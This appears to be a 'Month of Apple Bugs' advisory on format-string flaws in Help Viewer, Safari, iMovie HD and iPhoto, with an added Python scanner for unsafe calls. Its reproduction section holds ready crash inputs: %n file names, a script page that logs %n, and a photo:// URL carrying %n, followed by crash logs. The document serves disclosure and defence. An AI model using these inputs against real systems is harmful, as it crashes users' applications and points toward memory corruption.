Sketch

Summary

As MOAB begins to come to a close we have decided that it is time for a montage of some sort. By definition alone we can bring you nothing short of a closely juxtaposed composite of pure pwnage. Lucky for us Apple's AppKit framework and a few Apple Developers are all we need.

Previously we have highlighted format string issues in Apple Installer, Software Update, iChat, and iPhoto. In today's montage we will add Apple Help Viewer, Safari and iMovie to the list. Coincidentally iPhoto will also be making a return visit (à la Jim Jones). Long live Team America, too.

Affected versions

The following versions were used during our testing:
Help Viewer 3.0.0 (144.1)
Safari 2.0.4 (419.3)
iMovie HD 6.0.3 (267.2)
iPhoto 6.0.5 (316)

Proof of concept, exploit or instructions to reproduce

As we have mentioned in past releases, these problems originate in the following printf()-style functions from Apple's AppKit and Foundation frameworks, each of which takes a format string followed by a variable argument list:

* NSBeginAlertSheet
* NSBeginCriticalAlertSheet
* NSBeginInformationalAlertSheet
* NSGetAlertPanel
* NSGetCriticalAlertPanel
* NSGetInformationalAlertPanel
* NSReleaseAlertPanel
* NSRunAlertPanel
* NSRunCriticalAlertPanel
* NSRunInformationalAlertPanel
* NSLog

Multiple developers of Apple-based software, including Apple's own developers, seem to misunderstand how to use the above functions properly: user-controlled text (a file name, a URL, a script argument) is passed as the format string itself instead of as a %@ argument to a constant format. "For the sake of lulz alone a montage must ensue..."
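As an added illustration (not part of this advisory or of Apple's code), a small Python scanner that flags calls to the functions listed above whose format parameter is not a constant @"..." literal. The Objective-C sample it scans is constructed for this example; the format-parameter positions come from the public declarations (NSLog: first argument; NSRun*/NSGet*AlertPanel: second; NSBegin*AlertSheet: tenth).

```python
import re

# 0-based position of the format parameter in each function the advisory lists
# (NSReleaseAlertPanel takes no format string and is omitted).
FORMAT_ARG_INDEX = {"NSLog": 0, "NSBeginAlertSheet": 9, "NSBeginCriticalAlertSheet": 9,
                    "NSBeginInformationalAlertSheet": 9}
FORMAT_ARG_INDEX.update({f: 1 for f in ("NSRunAlertPanel", "NSRunCriticalAlertPanel",
    "NSRunInformationalAlertPanel", "NSGetAlertPanel", "NSGetCriticalAlertPanel",
    "NSGetInformationalAlertPanel")})
CALL_RE = re.compile(r"\b(" + "|".join(FORMAT_ARG_INDEX) + r")\s*\(")
LITERAL_RE = re.compile(r'^\s*@"(?:[^"\\]|\\.)*"\s*$')   # a constant @"..." format

def split_args(src, start):
    """Split the call whose '(' is at src[start] into its top-level argument strings."""
    args, depth, in_str, seg = [], 0, False, start + 1
    for i in range(start + 1, len(src)):
        c = src[i]
        if in_str:                                  # inside "...": only an unescaped " ends it
            in_str = not (c == '"' and src[i - 1] != "\\")
        elif c == '"':
            in_str = True
        elif c in "([{":
            depth += 1
        elif c in ")]}":
            if depth == 0:                          # the call's own closing paren
                return args + [src[seg:i]]
            depth -= 1
        elif c == "," and depth == 0:
            args.append(src[seg:i]); seg = i + 1
    return args                                     # unterminated call: best effort

def find_format_string_sinks(src):
    """Return (line, function, format_arg) for every call whose format is not a literal."""
    findings = []
    for m in CALL_RE.finditer(src):
        func, args = m.group(1), split_args(src, m.end() - 1)
        idx = FORMAT_ARG_INDEX[func]
        if idx < len(args) and not LITERAL_RE.match(args[idx]):
            findings.append((src.count("\n", 0, m.start()) + 1, func, args[idx].strip()))
    return findings

# Constructed sample source (not Apple's code): the unsafe and safe idiom side by side.
SAMPLE = """- (void)openFailed:(NSString *)path {
    NSLog(path);                                              // path is the format
    NSLog(@"open failed: %@", path);                          // path is a %@ argument
    NSRunCriticalAlertPanel(@"Error", path, @"OK", nil, nil);
    NSRunCriticalAlertPanel(@"Error", @"%@", @"OK", nil, nil, path);
    NSBeginAlertSheet(@"Error", @"OK", nil, nil, win, self, NULL, NULL, NULL,
                      [NSString stringWithFormat:@"%@ failed", path]);
}"""
```

The last sample call is flagged on purpose: a string that was already formatted from user input and is then handed over as a format again is the same bug one call later.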

Safari, iMovie and Help Viewer:

joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Help Viewer.crash.log   Safari.crash.log        iMovie HD.crash.log

Safari:

joe-schmoes-computer:/tmp js$ cat test.html
<script>
window.console.log('%n%n%nOh it takes a montage%n%n%n')
</script>

joe-schmoes-computer:/tmp js$ open test.html
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Safari.crash.log

iPhoto:

joe-schmoes-computer:/tmp js$ open 'photo://%25n%25n%25n%25n%25n%25n'
joe-schmoes-computer:/tmp js$ ls ~/Library/Logs/CrashReporter/
iPhoto.crash.log

Debugging Montage

iPhoto:

Version:        6.0.5 (6.0.5)
Build Version:  2
Project Name:   iPhotoProject
Source Version: 3160000

PID:    874
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x925da956

Thread 0 Crashed:
0   libSystem.B.dylib           0x9000c0c1 __vfprintf + 4976
1   libSystem.B.dylib           0x90100ea9 snprintf_l + 504
2   com.apple.CoreFoundation    0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3   com.apple.CoreFoundation    0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4   com.apple.Foundation        0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5   com.apple.Foundation        0x92678e6c +[NSString localizedStringWithFormat:] + 129
6   com.apple.iPhoto            0x0002ae3a 0x1000 + 171578
7   com.apple.iPhoto            0x0031298f 0x1000 + 3217807

Safari:

Version:        2.0.4 (419.3)
Build Version:  7
Project Name:   WebBrowser
Source Version: 4190300

PID:    455
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x00000020

Thread 0 Crashed:
0   libobjc.A.dylib             0x90a55380 objc_msgSend + 16
1   com.apple.AppKit            0x93364838 -[NSWindow(Sheets) _positionSheetConstrained:andDisplay:] + 278
2   com.apple.AppKit            0x9336785e -[NSMoveHelper(Sheets) _moveParent:andOpenSheet:] + 424
3   com.apple.AppKit            0x9336759a -[NSWindow(Sheets) _orderFrontRelativeToWindow:] + 168
4   com.apple.AppKit            0x9328f9ec -[NSWindow _reallyDoOrderWindow:relativeTo:findKey:forCounter:force:isModal:] + 2877
5   com.apple.AppKit            0x933389d8 -[NSApplication _orderFrontModalWindow:relativeToWindow:] + 1074
6   com.apple.AppKit            0x9333833a -[NSApplication _commonBeginModalSessionForWindow:relativeToWindow:modalDelegate:didEndSelecto$
7   com.apple.AppKit            0x93364f7d -[NSApplication beginSheet:modalForWindow:modalDelegate:didEndSelector:contextInfo:] + 122
8   com.apple.AppKit            0x9335f3bf _NXDoLocalRunAlertSheet + 922
9   com.apple.AppKit            0x9335f022 NSBeginAlertSheet + 100
10  com.apple.Safari            0x0008300f 0x1000 + 532495

Help Viewer:

Version:        3.0.0 (144.1)
Build Version:  20
Project Name:   HelpViewer
Source Version: 1440800

PID:    970
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x9a1ab5ac

Thread 0 Crashed:
0   libSystem.B.dylib           0x9000c0c1 __vfprintf + 4976
1   libSystem.B.dylib           0x90100ea9 snprintf_l + 504
2   com.apple.CoreFoundation    0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3   com.apple.CoreFoundation    0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4   com.apple.Foundation        0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5   com.apple.Foundation        0x925fc670 -[NSString initWithFormat:arguments:] + 55
6   com.apple.AppKit            0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144
7   com.apple.AppKit            0x9335f2e0 _NXDoLocalRunAlertSheet + 699
8   com.apple.AppKit            0x9335f022 NSBeginAlertSheet + 100
9   com.apple.helpui            0x9a1aca64 -[HelpViewController _displayAlertMessage:withInformativeText:] + 165
10  com.apple.helpui            0x9a1ab79e -[HelpViewController webView:unableToImplementPolicyWithError:frame:] + 512

iMovie HD:

Version:        6.0.3 (6.0.3)
Build Version:  14
Project Name:   iMovieApp
Source Version: 2670200

PID:    1013
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x00000000

Thread 0 Crashed:
0   libSystem.B.dylib           0x9000c0c1 __vfprintf + 4976
1   libSystem.B.dylib           0x90100ea9 snprintf_l + 504
2   com.apple.CoreFoundation    0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3   com.apple.CoreFoundation    0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4   com.apple.Foundation        0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5   com.apple.Foundation        0x925fc670 -[NSString initWithFormat:arguments:] + 55
6   com.apple.AppKit            0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144
7   com.apple.AppKit            0x934ac77a _NXDoLocalRunAlertPanel + 683
8   com.apple.AppKit            0x93588ad6 NSRunCriticalAlertPanel + 69
9   com.apple.iMovie            0x000f3f3e 0x1000 + 995134
10  com.apple.iMovie            0x000f3fcf 0x1000 + 995279

Safari (debug enabled):

defaults write com.apple.Safari IncludeDebugMenu 1

Version:        2.0.4 (419.3)
Build Version:  7
Project Name:   WebBrowser
Source Version: 4190300

PID:    1042
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x90a9755c

Thread 0 Crashed:
0   libSystem.B.dylib           0x9000c0c1 __vfprintf + 4976
1   libSystem.B.dylib           0x90100ea9 snprintf_l + 504
2   com.apple.CoreFoundation    0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3   com.apple.CoreFoundation    0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4   com.apple.Foundation        0x92605ab9 NSLogv + 85
5   com.apple.Foundation        0x926433a5 NSLog + 27
6   libobjc.A.dylib             0x90a58c56 objc_msgSendv + 54
7   com.apple.Foundation        0x925f443e -[NSInvocation invoke] + 932
8   com.apple.JavaScriptCore    0x9527deab KJS::Bindings::ObjcInstance::invokeMethod(KJS::ExecState*, KJS::Bindings::MethodList const&, KJS::List const&) + 1047
9   com.apple.JavaScriptCore    0x9527a220 KJS::RuntimeMethodImp::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 228
10  com.apple.JavaScriptCore    0x9523f77e KJS::Object::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 158

Notes

Exploitation conditions

All of these functions behave like printf(): the format string is interpreted, so directives such as %n in attacker-supplied text are acted upon, as the __vfprintf frames in the crash logs above show. Due to a bug in CoreFoundation, these issues are currently difficult to exploit for code execution. Still, certain conditions exist that make it possible under certain circumstances.

Workaround or temporary solution

Seek out Landon Fuller and he shall destroy all that is evil!

All your AlertPanel are belong to us.